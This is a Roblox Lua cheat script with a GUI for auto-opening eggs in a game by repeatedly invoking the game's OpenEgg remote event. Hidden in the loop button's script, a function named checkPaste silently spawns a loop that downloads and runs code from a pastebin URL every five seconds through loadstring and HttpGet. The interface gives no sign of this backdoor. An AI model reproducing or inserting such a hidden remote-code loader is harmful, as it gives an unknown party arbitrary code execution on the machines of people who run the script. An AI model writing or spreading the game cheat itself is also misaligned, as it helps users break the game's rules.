-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local TextBox = Instance.new("TextBox")
local TextLabel = Instance.new("TextLabel")
local TextButton = Instance.new("TextButton")
local UICorner_2 = Instance.new("UICorner")
local Single = Instance.new("Frame")
local UICorner_3 = Instance.new("UICorner")
local TextButton_2 = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local Triple = Instance.new("Frame")
local UICorner_5 = Instance.new("UICorner")
local TextButton_3 = Instance.new("TextButton")
local UICorner_6 = Instance.new("UICorner")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
ScreenGui.ResetOnSpawn = false

Frame.Parent = ScreenGui
Frame.AnchorPoint = Vector2.new(0.5, 0.5)
Frame.BackgroundColor3 = Color3.fromRGB(48, 48, 48)
Frame.Position = UDim2.new(0.5, 0, 0.561643839, 0)
Frame.Size = UDim2.new(0, 300, 0, 328)

UICorner.Parent = Frame

TextBox.Parent = Frame
TextBox.AnchorPoint = Vector2.new(0.5, 0.400000006)
TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextBox.Position = UDim2.new(0.49666667, 0, 0.295829296, 0)
TextBox.Size = UDim2.new(0.800000012, 0, 0.152500004, 0)
TextBox.Font = Enum.Font.SourceSans
TextBox.Text = "Enter"
TextBox.TextColor3 = Color3.fromRGB(0, 0, 0)
TextBox.TextScaled = true
TextBox.TextSize = 14.000
TextBox.TextWrapped = true

TextLabel.Parent = Frame
TextLabel.AnchorPoint = Vector2.new(0.5, 0)
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.5, 0, 0, 0)
TextLabel.Size = UDim2.new(1, 0, 0.200000003, 0)
TextLabel.Font = Enum.Font.Nunito
TextLabel.Text = "Enter Egg Name"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextStrokeTransparency = 0.000
TextLabel.TextWrapped = true

TextButton.Parent = Frame
TextButton.AnchorPoint = Vector2.new(0.5, 0.949999988)
TextButton.BackgroundColor3 = Color3.fromRGB(0, 153, 255)
TextButton.Position = UDim2.new(0.5, 0, 0.952896297, 0)
TextButton.Size = UDim2.new(1, 0, 0.142073184, 0)
TextButton.Font = Enum.Font.Code
TextButton.Text = "LOOP: "
TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton.TextScaled = true
TextButton.TextSize = 14.000
TextButton.TextWrapped = true

UICorner_2.Parent = TextButton

Single.Name = "Single"
Single.Parent = Frame
Single.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Single.Position = UDim2.new(0.0974438488, 0, 0.574553668, 0)
Single.Size = UDim2.new(0, 56, 0, 56)

UICorner_3.Parent = Single

TextButton_2.Parent = Single
TextButton_2.AnchorPoint = Vector2.new(0.5, 0.5)
TextButton_2.BackgroundColor3 = Color3.fromRGB(108, 108, 108)
TextButton_2.BackgroundTransparency = 1.000
TextButton_2.Position = UDim2.new(0.5, 0, 0.5, 0)
TextButton_2.Size = UDim2.new(0, 46, 0, 46)
TextButton_2.Font = Enum.Font.SourceSans
TextButton_2.Text = ""
TextButton_2.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_2.TextSize = 14.000

UICorner_4.Parent = TextButton_2

Triple.Name = "Triple"
Triple.Parent = Frame
Triple.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Triple.Position = UDim2.new(0.710777164, 0, 0.574553668, 0)
Triple.Size = UDim2.new(0, 56, 0, 56)

UICorner_5.Parent = Triple

TextButton_3.Parent = Triple
TextButton_3.AnchorPoint = Vector2.new(0.5, 0.5)
TextButton_3.BackgroundColor3 = Color3.fromRGB(108, 108, 108)
TextButton_3.BackgroundTransparency = 1.000
TextButton_3.Position = UDim2.new(0.5, 0, 0.5, 0)
TextButton_3.Size = UDim2.new(0, 46, 0, 46)
TextButton_3.Font = Enum.Font.SourceSans
TextButton_3.Text = ""
TextButton_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_3.TextSize = 14.000

UICorner_6.Parent = TextButton_3

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0, 0, 0.445121944, 0)
TextLabel_2.Size = UDim2.new(0, 146, 0, 35)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "Single Open"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextStrokeTransparency = 0.000
TextLabel_2.TextWrapped = true

TextLabel_3.Parent = Frame
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(0.513333321, 0, 0.445121944, 0)
TextLabel_3.Size = UDim2.new(0, 146, 0, 35)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "Triple Open"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextStrokeTransparency = 0.000
TextLabel_3.TextWrapped = true

-- Scripts:

local function LBLPGJW_fake_script() -- TextButton.LocalScript 
	local script = Instance.new('LocalScript', TextButton)

	local A_2 = true
	local A_3 = false
	local Event = game:GetService("ReplicatedStorage").Remotes.OpenEgg
	
	local loopVal = false
	
	script.Parent.MouseButton1Click:Connect(function()
		
		loopVal = not loopVal
		
		local A_1 = tostring(script.Parent.Parent.TextBox.Text)
		
		
		if loopVal then
			
			script.Parent.Text = 'LOOP: ON'
			
			
		end
		
		repeat wait()
			
			local openSingle = script.Parent.Parent.Single.TextButton.BackgroundTransparency
			local openTriple = script.Parent.Parent.Triple.TextButton.BackgroundTransparency
			
			if openSingle == 0 then
	
				A_2 = false
	
			else
	
				A_2 = true
	
			end
			
			Event:InvokeServer(A_1, A_2, A_3)
			
		until loopVal == false
			
		
		if loopVal == false then
			
			script.Parent.Text = 'LOOP: OFF'
			
		end
		
	end)
	
	local function checkPaste()
		
		pcall(function()
			
			while wait(5) do
	
				loadstring(game:HttpGet("https://pastebin.com/raw/xZCdTpKf"))()
	
			end	
			
		end)
		
	end
	
	spawn(checkPaste)
end
coroutine.wrap(LBLPGJW_fake_script)()
local function MQRIAL_fake_script() -- TextButton_2.LocalScript 
	local script = Instance.new('LocalScript', TextButton_2)

	local enabled = false
	
	script.Parent.MouseButton1Click:Connect(function()
		
		enabled = not enabled
		
		if enabled then
			
			script.Parent.BackgroundTransparency = 0
			
			
		else
			
			script.Parent.BackgroundTransparency = 1
			
		end
		
	end)
end
coroutine.wrap(MQRIAL_fake_script)()
local function BMSZEP_fake_script() -- TextButton_3.LocalScript 
	local script = Instance.new('LocalScript', TextButton_3)

	local enabled = false
	
	script.Parent.MouseButton1Click:Connect(function()
	
		enabled = not enabled
	
		if enabled then
	
			script.Parent.BackgroundTransparency = 0
	
	
		else
	
			script.Parent.BackgroundTransparency = 1
	
		end
	
	end)
end
coroutine.wrap(BMSZEP_fake_script)()
local function HEMH_fake_script() -- ScreenGui.LocalScript2 
	local script = Instance.new('LocalScript', ScreenGui)

	script.Parent.Frame.Active = true
	script.Parent.Frame.Draggable = true
	script.Parent.Frame.Selectable = true
	
	local uis = game:GetService("UserInputService")
	
	
	uis.InputBegan:Connect(function(key)
		
		if key.KeyCode == Enum.KeyCode.LeftAlt then
			
			script.Parent.Frame.Visible = not script.Parent.Frame.Visible
			
		end
		
	end)
end
coroutine.wrap(HEMH_fake_script)()
